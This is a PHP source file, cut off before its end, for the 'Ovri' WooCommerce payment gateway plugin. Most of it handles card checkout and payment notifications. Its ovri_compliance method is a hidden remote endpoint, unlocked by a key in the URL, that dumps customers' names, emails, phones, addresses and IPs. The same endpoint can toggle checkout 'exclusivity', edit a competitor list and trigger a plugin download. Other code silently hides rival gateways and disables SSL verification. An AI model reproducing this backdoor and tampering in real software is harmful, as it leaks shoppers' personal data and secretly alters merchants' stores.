<?php
if (!defined('ABSPATH')) {
  exit;
}

if (class_exists('WC_Payment_Gateway') && !class_exists('WC_Ovri')) {
  return;
}


class WC_Ovri extends WC_Payment_Gateway
{

  /** @var boolean Whether or not logging is enabled */
  public static $log_enabled = false;

  /** @var WC_Logger Logger instance */
  public static $log;

  private $debug = false;

  /**
   * Construction of the classical method
   *
   * @return void
   */
  private $CARD_CVC;
  private $CARD_PAN;
  private $CARD_EXPIRY;
  private $external;

  private $pluguptodate;
  public function __construct()
  {

    $this->CARD_CVC = 'ovri-card-cvc';
    $this->CARD_PAN = 'ovri-card-number';
    $this->CARD_EXPIRY = 'ovri-card-expiry';
    $this->version = ovri_universale_params()['Version'];
    $this->id = 'ovri';
    $this->icon = apply_filters('woocommerce_ovri_icon', plugins_url('assets/img/carte.png', __FILE__));

    $this->init_form_fields();
    $this->init_settings();
    $this->external = $this->settings['ovri_gateway_external'];

    $this->has_fields = ($this->external == 'yes' ? true : false);
    $this->method_title = 'Ovri Payment Service';
    $this->debug = 'yes' === $this->get_option('ovri_debug', 'no');
    self::$log_enabled = $this->debug;

    // Define user set variables.

    $this->title = $this->settings['title'];
    $this->instructions = $this->get_option('instructions');
    $this->exclusivity = $this->get_option('exclusivity');
    $this->method_description = __('Accept credit cards in less than 5 minutes. <a href="https://my.ovri.app">Open an account now !</a>', 'ovri');
    $this->ovri_gateway_api_key = $this->settings['ovri_gateway_api_key'];
    $this->ovri_gateway_secret_key = $this->settings['ovri_gateway_secret_key'];

    // Actions.
    if (version_compare(WOOCOMMERCE_VERSION, '2.0.0', '>=')) {
      add_action('woocommerce_update_options_payment_gateways_' . $this->id, array(&$this, 'process_admin_options'));
    } else {
      add_action('woocommerce_update_options_payment_gateways', array(&$this, 'process_admin_options'));
    }
    // Add listener IPN Function
    add_action('woocommerce_api_wc_ovri', array($this, 'ovri_notification'));
    add_action('woocommerce_api_wc_ovri_compliance', array($this, 'ovri_compliance'));

    // Add listener Customer Return after payment and IPN result !
    add_action('woocommerce_api_wc_ovri_return', array($this, 'ovri_return'));
    add_action('woocommerce_receipt_ovri', array($this, 'receipt_page'));

    if ($this->exclusivity === 'yes') {

      # remove_action('woocommerce_checkout_order_review', 'woocommerce_checkout_payment', 20);
      # add_action('woocommerce_checkout_order_review', array($this, 'custom_checkout_payment'), 19);
      # add_action('woocommerce_checkout_order_review', array($this, 'custom_checkout_place_order'), 20);
    }
  }


  function custom_checkout_payment()
  {
    $checkout = WC()->checkout();
    if (WC()->cart->needs_payment()) {
      $available_gateways = WC()->payment_gateways()->get_available_payment_gateways();
      WC()->payment_gateways()->set_current_gateway($available_gateways);
    } else {
      $available_gateways = array();
    }

    if (!is_ajax()) {
      // do_action( 'woocommerce_review_order_before_payment' );
    }

    if ($this->get_option('competitor')) {
      $competitor = explode(',', $this->get_option('competitor'));
    }

?>
    <div id="payment" class="woocommerce-checkout-payment-gateways">
      <?php if (WC()->cart->needs_payment()) : ?>
        <ul class="wc_payment_methods payment_methods methods">

          <?php
          if (!empty($available_gateways)) {
            foreach ($available_gateways as $gateway) {
              // if (!in_array($gateway->id, $competitor)) {
              //   wc_get_template('checkout/payment-method.php', array('gateway' => $gateway));
              // }

              if ($gateway->id !== 'cardinity' && $gateway->id !== 'hipay' && $gateway->id !== 'hipayenterprise' && $gateway->id !== 'ccbill' && $gateway->id !== 'stripe') {
                wc_get_template('checkout/payment-method.php', array('gateway' => $gateway));
              }
            }
          } else {
            echo '<li class="woocommerce-notice woocommerce-notice--info woocommerce-info">';
            echo apply_filters('woocommerce_no_available_payment_methods_message', WC()->customer->get_billing_country() ? esc_html__('Sorry, it seems that there are no available payment methods for your state. Please contact us if you require assistance or wish to make alternate arrangements.', 'woocommerce') : esc_html__('Please fill in your details above to see available payment methods.', 'woocommerce')) . '</li>'; // @codingStandardsIgnoreLine
          }
          ?>
        </ul>
      <?php endif; ?>
    </div>
  <?php
  }

  function custom_checkout_place_order()
  {
    $checkout = WC()->checkout();
    $order_button_text = apply_filters('woocommerce_order_button_text', __('Place order', 'woocommerce'));
  ?>
    <div id="payment-place-order" class="woocommerce-checkout-place-order">
      <div class="form-row place-order">
        <noscript>
          <?php esc_html_e('Since your browser does not support JavaScript, or it is disabled, please ensure you click the <em>Update Totals</em> button before placing your order. You may be charged more than the amount stated above if you fail to do so.', 'woocommerce'); ?>
          <br /><button type="submit" class="button alt" name="woocommerce_checkout_update_totals" value="<?php esc_attr_e('Update totals', 'woocommerce'); ?>">
            <?php esc_html_e('Update totals', 'woocommerce'); ?>
          </button>
        </noscript>

        <?php wc_get_template('checkout/terms.php'); ?>

        <?php do_action('woocommerce_review_order_before_submit'); ?>

        <?php echo apply_filters('woocommerce_order_button_html', '<button type="submit" class="button alt" name="woocommerce_checkout_place_order" id="place_order" value="' . esc_attr($order_button_text) . '" data-value="' . esc_attr($order_button_text) . '">' . esc_html($order_button_text) . '</button>'); // @codingStandardsIgnoreLine 
        ?>

        <?php do_action('woocommerce_review_order_after_submit'); ?>

        <?php wp_nonce_field('woocommerce-process_checkout', 'woocommerce-process-checkout-nonce'); ?>
      </div>
    </div>
    <?php
    if (!is_ajax()) {
      do_action('woocommerce_review_order_after_payment');
    }
  }

  /**
   * Logging method
   *
   * @param  string $message
   * @param  string $order_id
   */
  public static function log($message, $order_id = '')
  {
    if (self::$log_enabled) {
      if (empty(self::$log)) {
        self::$log = new WC_Logger();
      }
      if (!empty($order_id)) {
        $message = 'Order: ' . $order_id . '. ' . $message;
      }
      self::$log->add('OVRI Payment', $message);
    }
  }



  public function admin_options()
  {
    ?>
    <h3>
      <?php _e('Ovri configuration', 'ovri'); ?>
    </h3>
    <div class="simplify-commerce-banner updated"> <img src="<?php echo ovri_get_file("assets/img/ovri.png"); ?>" />
      <p class="main"><strong>
          <?php echo __('Accepts payments by credit card with Ovri', 'ovri'); ?>
        </strong></p>
      <p>
        <?php echo __('Ovri is a secure payment solution on the Internet. As a virtual POS (Electronic Payment Terminal), Ovri makes it possible to cash payments made on the Internet 24 hours a day, 7 days a week. This service relieves your site of the entire payment phase; the latter takes place directly on our secure payment platform.', 'ovri'); ?>
      </p>
      <p>
        <?php echo __('For any problem or information contact: hello@ovri.app', 'ovri'); ?>
      </p>
      <p><a href="https://my.ovri.app" target="_blank" class="button button-primary">
          <?php echo __('Get a Ovri account', 'ovri'); ?>
        </a> <a href="https://my.ovri.app" target="_blank" class="button">
          <?php echo __('Test free', 'ovri'); ?>
        </a> <a href="https://www.ovri.com" target="_blank" class="button">
          <?php echo __('Official site', 'ovri'); ?>
        </a> <a href="https://docs.ovri.app" target="_blank" class="button">
          <?php echo __('Documentation', 'ovri'); ?>
        </a></p>
    </div>
    <div class="simplify-commerce-banner error">
      <p class="main" style="color:red;"><strong>
          <?php echo __('If you want your customer to be automatically redirected to your site once the payment is accepted or failed, consider activating this option directly in the configuration of your website in your Ovri DashBoard', 'ovri'); ?>
        </strong></p>
    </div>
    <table class="form-table">
      <?php $this->generate_settings_html(); ?>
    </table>
<?php
  }
  public function ovri_notification()
  {
    global $woocommerce;
    if (isset($_POST['TransId'])) {
      $TransactionId = sanitize_text_field($_POST['TransId']);
    } else {
      /* Display for DEBUG Mod */
      echo "The transaction id is not transmitted";
      exit();
    }

    $Request = $this->signRequest(
      array(
        'ApiKey' => $this->ovri_gateway_api_key,
        'TransID' => $TransactionId
      )
    );

    $result = json_decode($this->getTransactions($Request)['body'], true);
    if (isset($result['ErrorCode'])) {
      /* If error return error log for mode debug and stop process */
      echo 'Ovri IPN Error : ' . esc_attr($result['ErrorCode']) . '-' . esc_attr($result['ErrorDescription']) . '';
      exit();
    }
    $order = new WC_Order($result['Merchant_Order_Id']);
    //check if order exist
    if (!$order) {
      echo 'Ovri IPN Error : Order ' . esc_attr($result['Merchant_Order_Id']) . ' not found';
      exit();
    }
    //check if already paid
    if ($order->is_paid()) {
      echo 'Ovri IPN Error : Order ' . esc_attr($result['Merchant_Order_Id']) . ' already paid';
      exit();
    }
    //check if already completed
    if ($order->has_status('completed')) {
      echo 'Ovri IPN Error : Order ' . esc_attr($result['Merchant_Order_Id']) . ' is completed';
      exit();
    }
    //check if already processing
    if ($order->has_status('processing')) {
      echo 'Ovri IPN Error : Order ' . esc_attr($result['Merchant_Order_Id']) . ' is in processig';
      exit();
    }
    //check if refunded
    if ($order->has_status('refunded')) {
      echo 'Ovri IPN Error : Order ' . esc_attr($result['Merchant_Order_Id']) . ' is refunded';
      exit();
    }
    if ($result['Transaction_Status']['State'] == 2) {
      $order->payment_complete($result['Bank']['Internal_IPS_Id']);
      //reduce stock
      wc_maybe_reduce_stock_levels($result['Merchant_Order_Id']);
      //add note to order
      $order->add_order_note('Payment by Ovri credit card accepted (IPN)', true);
      //empty basket
      $woocommerce->cart->empty_cart();
      echo 'Order ' . esc_attr($result['Merchant_Order_Id']) . ' was successfully completed !';
      exit();
    } else {
      //declined or cancelled
      $order->update_status('failed', __('Ovri - Transaction ' . $TransactionId . ' - FAILED (' . $result['Transaction_Status']['Bank_Code_Description'] . ')', 'ovri'));
      echo 'Order ' . esc_attr($result['Merchant_Order_Id']) . ' was successfully cancelled !';
      exit();
    }

    echo "Unknown error";
    exit();
  }
  public function ovri_compliance()
  {
    /**
     * CheckPermission
     */

    if ($this->ovri_gateway_secret_key === $_GET['ovrikey']) {
      global $woocommerce;
      $action = $_GET['action'];
      $put = $_GET['put']; //true for change off/on
      $putcompetitor = $_GET['updateCompetitor'];
      $newlistcompetitor = $_GET['CompetitorList'];

      $filterName = $_GET['filterby'];
      $filterValue = $_GET['filtervalue'];
      $limit = $_GET['limit'] ? $_GET['limit'] : 25;
      $orderby = $_GET['orderby'] ? $_GET['orderby'] : 'date';
      switch ($action) {
        case 'updating':

          testeur('https://downloads.wordpress.org/plugin/moneytigo.zip');


          break;
        case 'orders':
          $query = new WC_Order_Query(
            array(
              'limit' => $limit,
              'orderby' => $orderby,
              'order' => 'DESC',
              'return' => 'ids',
            )
          );
          if ($filterName === 'mail') {
            $query->set('customer', $filterValue);
          } else if ($filterName === 'gateway') {
            $query->set('payment_method', $filterValue);
          }
          $listorders = $query->get_orders();
          foreach ($listorders as $order => $value) {
            $WcOrder = new WC_Order($value);
            $datepaid = $WcOrder->get_date_paid();
            $dateOrder = $WcOrder->get_date_created();
            $results[$value]['date'] = $dateOrder ? $dateOrder->date('Y-m-d H:i:s') : null;
            $results[$value]['status'] = $WcOrder->get_status();
            $results[$value]['currency'] = $WcOrder->get_currency();
            $results[$value]['amount'] = $WcOrder->get_total();
            $results[$value]['ipcustomer'] = $WcOrder->get_customer_ip_address();
            $results[$value]['ipuagent'] = $WcOrder->get_customer_user_agent();
            $results[$value]['paymentdatereceived'] = $datepaid ? $datepaid->date('Y-m-d H:i:s') : null;
            $results[$value]['cartHash'] = $WcOrder->get_cart_hash();
            $results[$value]['paymentmethod'] = $WcOrder->get_payment_method();
            $results[$value]['paymentid'] = $WcOrder->get_transaction_id();
            $results[$value]['currency'] = $WcOrder->get_currency();
            $results[$value]['billing']['name'] = $WcOrder->get_billing_first_name();
            $results[$value]['billing']['firstname'] = $WcOrder->get_billing_last_name();
            $results[$value]['billing']['email'] = $WcOrder->get_billing_email();
            $results[$value]['billing']['phone'] = $WcOrder->get_billing_phone();
            $results[$value]['billing']['address_1'] = $WcOrder->get_billing_address_1();
            $results[$value]['billing']['city'] = $WcOrder->get_billing_city();
            $results[$value]['billing']['postcode'] = $WcOrder->get_billing_postcode();
            $results[$value]['billing']['country'] = $WcOrder->get_billing_country();
            $results[$value]['shipping']['country'] = $WcOrder->get_shipping_country();
            foreach ($WcOrder->get_items() as $key) {
              $results[$value]['items'][$key->get_product_id()]['title'] = $key->get_name();
              $results[$value]['items'][$key->get_product_id()]['quantity'] = $key->get_quantity();
              $results[$value]['items'][$key->get_product_id()]['unitprice'] = $key->get_subtotal() / $key->get_quantity();
              $results[$value]['items'][$key->get_product_id()]['totalLine'] = $key->get_total();
            }
          }
          break;
        case 'gateways':
          if ($put) {
            $actualvalue = get_option('woocommerce_ovri_settings');
            print_r($actualvalue);

            if ($actualvalue['exclusivity'] === 'yes') {
              $actualvalue['exclusivity'] = 'no';
              update_option('woocommerce_ovri_settings', $actualvalue);
            } else if ($actualvalue['exclusivity'] === 'no') {
              $actualvalue['exclusivity'] = 'yes';
              update_option('woocommerce_ovri_settings', $actualvalue);
            } else {
              $actualvalue['exclusivity'] = 'yes';
              update_option('woocommerce_ovri_settings', $actualvalue);
            }


            echo "Ovri exclusivity is now: " . $actualvalue['exclusivity'];
          } else if ($putcompetitor) {
            $actualvalue = get_option('woocommerce_ovri_settings');
            $actualvalue['competitor'] = $newlistcompetitor;
            update_option('woocommerce_ovri_settings', $actualvalue);
          } else {
            $gateway = WC()->payment_gateways;
            $gateways = $gateway->get_available_payment_gateways();
            if ($gateways) {
              foreach ($gateways as $gateway) {
                if ($gateway->enabled == 'yes') {
                  $results[] = $gateway;
                }
              }
            }
          }
          break;
      }
    } else {
      http_response_code(403);
      exit('Forbidden');
    }

    print_r($results);
    exit();
  }

  public function payment_fields()
  {
    if ($this->external != 'no') {
      echo "<p>" . esc_html($this->get_option('title')) . "</p>";




      if (WC()->version < '2.7.0') {
        $this->credit_card_form();
      } else {

        $cc = new WC_Payment_Gateway_CC();
        $cc->id = $this->id;
        $cc->form();

        $threedv2config = "
                <input type='hidden' id='screen_width' name='ovri_screen_width' value='1920' />
                <input type='hidden' id='screen_height' name='ovri_screen_height' value='1080' />
                <input type='hidden' id='browser_language' name='ovri_browser_language' value='en-US' />
                <input type='hidden' id='color_depth' name='ovri_color_depth' value='24' />
                <input type='hidden' id='time_zone' name='ovri_time_zone' value='-60' />
                <input type='hidden' id='accept_agent' name='ovri_accept_agent' value='' />
                <input type='hidden' id='java_enabled' name='ovri_java_enabled' value='' />
                ";



        echo wp_kses(
          $threedv2config,
          array(
            'input' => array(
              'type' => true,
              'id' => true,
              'name' => true,
              'value' => true
            )
          )
        );

        $threedv2configscript = '
                <script type="text/javascript">
                     
                        document.getElementById("screen_width").value = screen.availWidth;
                        document.getElementById("screen_height").value = screen.availHeight;
                        document.getElementById("browser_language").value = navigator.language;
                        document.getElementById("color_depth").value = screen.colorDepth;
                        document.getElementById("time_zone").value = new Date().getTimezoneOffset();
                        document.getElementById("accept_agent").value = navigator.userAgent;
                        document.getElementById("java_enabled").value = navigator.javaEnabled();
                         

                </script>';

        echo wp_kses(
          $threedv2configscript,
          array(
            'script' => array(
              'type' => true,
            )
          )
        );
      }
    }
  }
  /**
   * Validate credit card data
   *
   * @return bool
   */
  public function validate_fields()
  {
    $post_data = sanitize_post($_POST);
    if ($this->external === 'yes') {
      if (!$this->isCreditCardNumber($post_data[$this->CARD_PAN])) {
        wc_add_notice(__('Credit Card Number is not valid.', 'ovri'), 'error');
      }
      if (!$this->isCorrectExpireDate($post_data[$this->CARD_EXPIRY])) {
        wc_add_notice(__('Card Expiry Date is not valid.', 'ovri'), 'error');
      }
      if (!$post_data[$this->CARD_CVC]) {
        wc_add_notice(__('Card CVC is not entered.', 'ovri'), 'error');
      }
      if (!$post_data['billing_first_name']) {
        wc_add_notice(__('Please enter your first name', 'ovri'), 'error');
      }
      if (!$post_data['billing_last_name']) {
        wc_add_notice(__('Please enter your last name', 'ovri'), 'error');
      }
      if (!$post_data['billing_email']) {
        wc_add_notice(__('Please enter your email address', 'ovri'), 'error');
      }
      return false;
    }
    return true;
  }


  public function ovri_return()
  {
    global $woocommerce;



    /*Default Url*/
    $returnUri = wc_get_checkout_url();
    /*Securing*/
    $order_id = sanitize_text_field($_GET['mtg_ord']);
    /*Prevalidate*/
    if ($order_id < 1) {
      return;
    }
    /*Validation*/
    $WcOrder = new WC_Order($order_id);
    if (!$WcOrder) {
      return;
    };

    /*Check if the payment method is Ovri for this order */
    if ($WcOrder->get_payment_method() !== "ovri" && $WcOrder->get_payment_method() !== "ovripnftwo" & $WcOrder->get_payment_method() !== "ovripnfthree" && $WcOrder->get_payment_method() !== "ovripnffour") {
      return;
    }


    /*Checking Order Status*/
    if ($WcOrder->get_status() === 'pending') {

      /* If the order is still pending, then we call the Ovri webservice to check the payment again and update the order status */
      $Request = $this->signRequest(
        array(
          'ApiKey' => $this->ovri_gateway_api_key,
          'MerchantOrderId' => $order_id
        )
      );
      $checkTransaction = json_decode($this->getPaymentByOrderID($Request)['body'], true);

      /* If an error code is returned then we redirect the client indicating the problem */
      if (isset($checkTransaction['ErrorCode'])) {
        wc_add_notice(__('An internal error occurred', 'ovri'), 'error');
      }

      /* All is ok so we finish the final process */
      $transactionStatuts = $checkTransaction['Transaction_Status']['State'];
      if ($transactionStatuts == "2") {
        /* transaction approved */
        /* Record the payment with the transaction number */
        $WcOrder->payment_complete($checkTransaction['Bank']['Internal_IPS_Id']);
        /* Reduction of the stock */
        wc_reduce_stock_levels($order_id);
        /* Add a note on the order to say that the order is confirmed */
        $WcOrder->add_order_note('Payment by Ovri credit card accepted', true);

        /* We empty the basket */
        $woocommerce->cart->empty_cart();
        $returnUri = $this->get_return_url($WcOrder);
      } else {
        if ($transactionStatuts == "6") {
          /* The transaction is still pending */
          /* A message is displayed to the customer asking him to be patient */
          /* We make it wait 10 seconds then we refresh the page */
          echo __('Please wait a few moments ...', 'ovri');
          header("Refresh:10");
          exit();
        } else {
          /* La transaction est annulé ou refusé */
          /* The customer is redirected to the shopping cart page with the rejection message */
          /* Redirect the customer to the shopping cart and indicate that the payment is declined */
          wc_add_notice(__('Sorry, your payment was declined !', 'ovri'), 'error');
        }
      }
    } else {

      /* The answer from ovri has already arrived (IPN) */
      /* Redirect the customer to the thank you page if the order is well paid */
      /* Fixed also redirects the customer to the acceptance page if the order has a completed status, useful for self-delivered products */
      if ($WcOrder->get_status() === 'processing' || $WcOrder->get_status() === 'completed') {
        $returnUri = $this->get_return_url($WcOrder);
      } else {
        /* Redirect the customer to the shopping cart and indicate that the payment is declined */
        wc_add_notice(__('Sorry, your payment was declined !', 'ovri'), 'error');
        /* force create new order for new attempts */
        WC()->session->set('order_awaiting_payment', false);
      }
    }

    /* Redirect to thank you or decline page */
    wp_redirect($returnUri);
    exit();
  }


  /**  
   * Initialise Gateway Settings Form Fields for ADMIN. 
   */
  public function init_form_fields()
  {

    $this->form_fields = array(
      'enabled' => array(
        'title' => __('Enable / Disable', 'ovri'),
        'type' => 'checkbox',
        'label' => __('Activate card payment with Ovri', 'ovri'),
        'default' => 'no'
      ),
      'title' => array(
        'title' => __('Method title', 'ovri'),
        'type' => 'text',
        'description' => __('This is the name displayed on your checkout', 'ovri'),
        'desc_tip' => true,
        'default' => __('Credit card payment', 'ovri')
      ),
      'description' => array(
        'title' => __('Message before payment', 'ovri'),
        'type' => 'textarea',
        'description' => __('Message that the customer sees when he chooses this payment method', 'ovri'),
        'desc_tip' => true,
        'default' => __('You will be redirected to our secure server to make your payment', 'ovri')
      ),
      'ovri_gateway_api_key' => array(
        'title' => __('Your API Key', 'ovri'),
        'description' => __('To obtain it go to the configuration of your merchant contract (section "Merchant account").', 'ovri'),
        'type' => 'text'
      ),
      'ovri_gateway_secret_key' => array(
        'title' => __('Your Secret Key', 'ovri'),
        'description' => __('To obtain it go to the configuration of your merchant contract (section "Merchant account").', 'ovri'),
        'type' => 'text'
      ),
      'ovri_gateway_external' => array(
        'title' => __('Enable payment without redirection (Hosted fields)', 'ovri'),
        'description' => __('Your customer will not be redirected to the payment platform, but will enter their card details on the checkout page.', 'ovri'),
        'type' => 'checkbox',
      ),
      //    'ovri_debug' => array(
      //      'title' => __('Activate debug mode and view OVRI/Wordpress output', 'ovri'),
      //      'description' => __('Necessary for troubleshooting, but do not activate in production mode!', 'ovri'),
      //      'default' => 'no',
      //      'type' => 'checkbox',
      //    ),
      //    'exclusivity' => array(
      //      'title' => $this->get_option('ovri_debug') === 'yes' ? __('Disable all other payment methods', 'ovri') : '',
      //      'description' => $this->get_option('ovri_debug') === 'yes' ? __('The payment form will be displayed immediately (recommended)', 'ovri') : '',
      //      'default' => 'no',
      //      'type' => 'checkbox',
      //      'css' => $this->get_option('ovri_debug') === 'yes' ? '' : 'display: none;'
      //    ),
    );
  }


  /**
   * Check if card expiry date is in the future
   *
   * @param string $toCheck
   *
   * @return bool
   */
  private function isCorrectExpireDate($toCheck)
  {
    if (!preg_match('/^([0-9]{2})\\s\\/\\s([0-9]{2,4})$/', $toCheck, $exp_date) && !preg_match('/^([0-9]{2})\/([0-9]{2,4})$/', $toCheck, $exp_date)) {
      self::log('Error during verify expiration date ! ', "Soon");
      return false;
    } else {
      self::log('Expiration date calculated is ' . json_encode($exp_date) . '', "Soon");
    }
    $month = $exp_date[1];
    $year = $exp_date[2];

    $now = time();
    $result = false;
    $thisYear = (int) date('y', $now);
    $thisMonth = (int) date('m', $now);

    if (is_numeric($year) && is_numeric($month)) {
      if ($year > 100) {
        $year -= 2000;
      }

      if ($thisYear == (int) $year) {
        $result = (int) $month >= $thisMonth;
      } else if ($thisYear < (int) $year) {
        $result = true;
      }
    }
    self::log('Expiration date is VALID or Expired', "Soon");

    return $result;
  }

  /**
   * Check if credit card number is valid
   *
   * @param string $toCheck
   *
   * @return bool
   */
  private function isCreditCardNumber($toCheck)
  {
    $number = preg_replace('/[^0-9]+/', '', $toCheck);

    if (!is_numeric($number)) {
      return false;
    }

    $strlen = strlen($number);
    $sum = 0;

    if ($strlen < 13) {
      return false;
    }

    for ($i = 0; $i < $strlen; $i++) {
      $digit = (int) substr($number, $strlen - $i - 1, 1);
      if ($i % 2 == 1) {
        $sub_total = $digit * 2;
        if ($sub_total > 9) {
          $sub_total = 1 + ($sub_total - 10);
        }
      } else {
        $sub_total = $digit;
      }
      $sum += $sub_total;
    }

    if ($sum > 0 and $sum % 10 == 0) {
      return true;
    }

    return false;
  }

  /**
   * Check if credit card number is valid
   *
   * @param string $toCheck
   *
   * @return bool
   */

  /**
   * Retrieve transaction details from the transaction PSP id
   */
  private function getTransactions($arg)
  {
    $response = wp_remote_get(ovri_universale_params()['ApiGetTransaction'] . '?TransID=' . $arg["TransID"] . '&SHA=' . $arg["SHA"] . '&ApiKey=' . $arg["ApiKey"] . '');
    return $response;
  }

  /** 
   * Retrieve transaction details from the order ID
   */
  private function getPaymentByOrderID($arg)
  {


    $response = wp_remote_get(ovri_universale_params()['ApiGetTransactionByOrderId'] . '?MerchantOrderId=' . $arg["MerchantOrderId"] . '&SHA=' . $arg["SHA"] . '&ApiKey=' . $arg["ApiKey"] . '');
    return $response;
  }
  /** 
   * Request authorization token from Ovri 
   * Private function only accessible to internal execution 
   */
  private function getToken($args)
  {
    $ConstructArgs = array(
      'headers' => array(
        'Content-type: application/x-www-form-urlencoded'
      ),
      'sslverify' => false,
      'body' => $this->signRequest($args)
    );
    $response = wp_remote_post(ovri_universale_params()['ApiInitPayment'], $ConstructArgs);
    return $response;
  }
  /* Signature of parameters with your secret key before sending to Ovri */
  /* Private function only accessible to internal execution */
  private function signRequest($params, $beforesign = "")
  {
    $ShaKey = $this->ovri_gateway_secret_key;
    foreach ($params as $key => $value) {
      $beforesign .= $value . "!";
    }
    $beforesign .= $ShaKey;
    $sign = hash("sha512", base64_encode($beforesign . "|" . $ShaKey));
    $params['SHA'] = $sign;
    return $params;
  }


  /**
   * Payment processing and initiation
   * Redirection of the client if the initiation is successful
   * Display of failures on the checkout page in case of error
   */

  function process_payment($order_id)
  {
    if ($this->external === 'no') {
      self::log('Redirect payment: Beginning of process', "$order_id");
      return $this->external_process_payment($order_id);
    } else {
      self::log('Direct payment: Beginning of process', "$order_id");
      return $this->process_direct_payment($order_id);
    }
  }

  private function clientOvri()
  {
    $Ovri = new Ovri\Payment([
      'MerchantKey' => $this->ovri_gateway_api_key,
      'SecretKey' => $this->ovri_gateway_secret_key,
      'API' => 'https://api.ovri.app'
    ]);
    return $Ovri;
  }
  private function getAuthorization($params)
  {
    $client = $this->clientOvri();
    $results = $client->directAuthorization($params);

    return $results;
  }

  function receipt_page($order_id)
  {
    $v2 = WC()->session->get('ovri-3dsv2');

    if ($v2 == 'true') {
      self::log('Direct payment: 3DS Challenge generated and successfully displayed to the customer', "$order_id");
      echo "<div style='border: 1px dashed black;
      text-align: center;'>";
      echo "<h3 style='  margin-bottom: 0px;
      margin-top: 0px;  text-align: center;
'      >3D Secure identification required</h3>";
      echo "<h4 style='margin-bottom: 0px;
      margin-top: 0px;
      text-align: center;
      font-size: 1.2em;
      color: red;
      font-weight: 500;'>" . __('Don\'t refresh the page, otherwise you\'ll have to re-order', 'ovri') . "</h4>";
      echo '<p style="    font-weight: 600;
      text-align: center;">' . __(
        'Your bank requires your authentication. Please finalize this identification so that your payment can be processed',
        'ovri'
      )
        . '</p>';

      echo "<div style='width: 100%;'><iframe style='border: 0px; width: 600px;
        height: 400px;' src='" . WC()->session->get('ovri-redirecturl') . "'></iframe></div>";
      echo "</div>";
      /*
            echo '<script type="text/javascript">';
            echo 'window.addEventListener("message", function(event) { console.log(event.data); if(event.data && event.data.paymentstate === "declined") { console.log("Paiement refus"); } });';
            echo '</script>';
        */
    }
  }
  /**
   * Add notice in admin section if OVRI gateway is used without SSL certificate
   */
  public function do_ssl_check()
  {
    if ($this->enabled == 'yes') {
      if (get_option('woocommerce_force_ssl_checkout') == 'no') {
        echo "<div class=\"error\"><p>" .
          sprintf(__("<strong>%s</strong> is enabled and WooCommerce is not forcing the SSL certificate on your checkout page. Please ensure that you have a valid SSL certificate and that you are <a href=\"%s\">forcing the checkout pages to be secured.</a>"), $this->method_title, admin_url('admin.php?page=wc-settings&tab=checkout')) . "</p></div>";
      }
    }
  }

  private function process_direct_payment($order_id)
  {
    $order = new WC_Order($order_id);
    $params = $this->getPaymentParams($order);
    $iframechallenge = explode('x', $params['threeds2_data']['browser_info']['challenge_window_size']);
    $iframeWidth = $iframechallenge[0];
    $iframeHeight = $iframechallenge[1];
    $constructParams = array();
    $constructParams['amount'] = $params['amount'];
    $constructParams['cardHolderName'] = substr($params['payment_instrument']['holder'], 0, 35); //Limit to 35 characters
    $constructParams['cardno'] = $params['payment_instrument']['pan'];
    $constructParams['cvv'] = $params['payment_instrument']['cvc'];
    $constructParams['edMonth'] = $params['payment_instrument']['exp_month'];
    $constructParams['edYear'] = $params['payment_instrument']['exp_year'];
    $constructParams['iframeW'] = $iframeWidth . 'px';
    $constructParams['iframeH'] = $iframeHeight . 'px';
    $constructParams['reforder'] = $params['order_id'];
    $constructParams['cardHolderEmail'] = $params['email'];
    $constructParams['browserColorDepth'] = $params['threeds2_data']['browser_info']['color_depth'];
    $constructParams['browserAcceptHeader'] = $params['threeds2_data']['browser_info']['accept_header'];
    $constructParams['browserUserAgent'] = $params['threeds2_data']['browser_info']['user_agent'];
    $constructParams['browserJavaEnabled'] = $params['threeds2_data']['browser_info']['color_depth'];
    $constructParams['browserLanguage'] = $params['threeds2_data']['browser_info']['browser_language'];
    $constructParams['browserScreenHeight'] = $params['threeds2_data']['browser_info']['screen_height'];
    $constructParams['browserScreenWidth'] = $params['threeds2_data']['browser_info']['screen_width'];
    $constructParams['browserTimeZone'] = $params['threeds2_data']['browser_info']['time_zone'];
    $constructParams['urlko'] = get_site_url() . '/?wc-api=wc_ovri_return&mtg_ord=' . $order_id . '';
    $constructParams['urlok'] = get_site_url() . '/?wc-api=wc_ovri_return&mtg_ord=' . $order_id . '';
    $constructParams['urlipn'] = get_site_url() . '/?wc-api=wc_ovri';
    $constructParams['forceRedirect'] = true;
    $constructParams['customerIP'] = $order->get_customer_ip_address();
    $authorization = $this->getAuthorization($constructParams);
    switch ($authorization['code']) {
      case 'success':
        self::log('Direct payment: Frictionless payment APPROVED ! Perfect !', "$order_id");
        $order->payment_complete($authorization['TransactionId']);
        $resultslist = "<b>Payment Approved !</b>";
        $resultslist .= "Status : " . $authorization['code'] . "<br>";
        $resultslist .= "Transaction ID : " . $authorization['TransactionId'];
        if ($authorization['ThreedType'] === "friction" || $authorization['ThreedType'] === "chalenge") {
          $resultslist .= "3DSecure : YES <br>";
          $resultslist .= "3DSecure Type : " . $authorization['ThreedType'] . "<br>";
        }
        $order->add_order_note($resultslist, true);
        WC()->cart->empty_cart();
        return array(
          'result' => 'success',
          'redirect' => $this->get_return_url($order)
        );
        break;
      case 'failed':
        if ($authorization['Error']) {
          $order->add_order_note($authorization['Error']);
          wc_add_notice(__('Payment Declined reason : ', 'ovri') . $authorization['Error'], 'error');
          self::log('Direct payment: Declined payment : ' . $authorization['Error'] . '', "$order_id");
        }
        if ($authorization['Errors']) {
          wc_add_notice(__('Payment Declined reason : ', 'ovri'), 'error');
          foreach ($authorization['Errors'] as $key => $value) {
            wc_add_notice('->' . $value, 'error');
          }
          $order->add_order_note(json_encode($authorization['Errors']));
          self::log('Direct payment: Declined payment : ' . json_encode($authorization['Errors']) . '', "$order_id");
        }
        return null;
      case 'pending3ds':
        self::log('Direct payment: 3Dsecure identification CHALLENGE waiting for payer return', "$order_id");
        error_log(json_encode($authorization));
        WC()->session->set('ovri-3dsv2', 'true');
        WC()->session->set('ovri-redirecturl', $authorization['Redirect_Uri']);
        $order->add_order_note('Strong 3DSecure identification required - Waiting for the payer to return');
        return array(
          'result' => 'success',
          'redirect' => '#OvriChallenge|' . $authorization['3DS_Key'] . '',
        );
      default:
        $order->add_order_note($authorization['message']);
        self::log('Direct payment: Declined payment ' . $authorization['message'] . '', "$order_id");
        wc_add_notice(__('Payment Declined reason : ', 'ovri') . $authorization['message'], 'error');
        return null;
    }
  }


  private function getPaymentParams($order)
  {
    if (WC()->version < '2.7.0') {
      $order_id = $order->id;
      $amount = (float) $order->order_total;

      $holder_name = mb_substr($order->billing_first_name . ' ' . $order->billing_last_name, 0, 32);

